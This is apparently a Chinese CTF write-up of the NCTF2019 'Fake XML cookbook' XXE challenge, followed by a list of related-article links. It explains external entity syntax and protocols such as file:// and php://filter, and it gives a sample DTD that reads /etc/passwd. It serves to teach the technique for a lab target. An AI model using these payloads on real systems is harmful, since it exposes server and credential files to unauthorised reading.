XXE漏洞 [NCTF2019]Fake XML cookbook1

打开题目

查看源代码

发现我们post传入的数据都被放到了doLogin.php下面

访问一下看看

提示加载外部xml实体

我们知道外部xml实体的格式是

复制代码
<!ENTITY 实体名称 SYSTEM "URI/URL">

bp抓包一下看看

得到flag

或者这样

但是很明显这样是不行的,因为资源是在admin上,也就是用户名那里

PHP引用外部实体,常见的利用协议
file://文件绝对路径

如:

file:///etc/passwd

http://url/file.txt

php://filter/read=convert.base64-encode/resource=xxx.php

参数实体+外部实体

<!ENTITY % 实体名称 SYSTEM "URI/URL">

参数实体+外部实体

示例代码:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "file:///etc/passwd">

%file;

]>

%file(参数实体)是在DTD中被引用的,而&file;是在xml文档中被引用的。

最简单的xxe注入

知识点源于:XML注入攻击总结_xml攻击-CSDN博客

从XML相关一步一步到XXE漏洞 - 先知社区

相关推荐
探索java35 分钟前
深入解析 Spring 获取 XML 验证模式的过程
xml·java·spring
阿华的代码王国2 小时前
【Android】卡片式布局 && 滚动容器ScrollView
android·xml·java·前端·后端·卡片布局·滚动容器
柊二三20 小时前
XML的简略知识点
xml·数据库·oracle
探索java1 天前
Spring 解析 XML 配置文件的过程(从读取 XML 到生成 BeanDefinition)
xml·java·spring·xmlbeanfactory
阿华的代码王国2 天前
【Android】相对布局应用-登录界面
android·xml·java
工藤新一OL2 天前
把xml的格式从utf-8-bom转为utf-8
xml·c#·asp.net·.netcore·visual studio
henysugar2 天前
便捷删除Android开发中XML中重复字符串资源的一个办法
android·xml
程序员编程指南2 天前
Qt XML 与 JSON 数据处理方法
xml·c语言·c++·qt·json
龚子亦4 天前
【Unity开发】数据存储——XML
xml·unity·游戏引擎·数据存储·游戏开发
海哥编程5 天前
Python 进阶(七):XML 基本操作
xml·javascript·python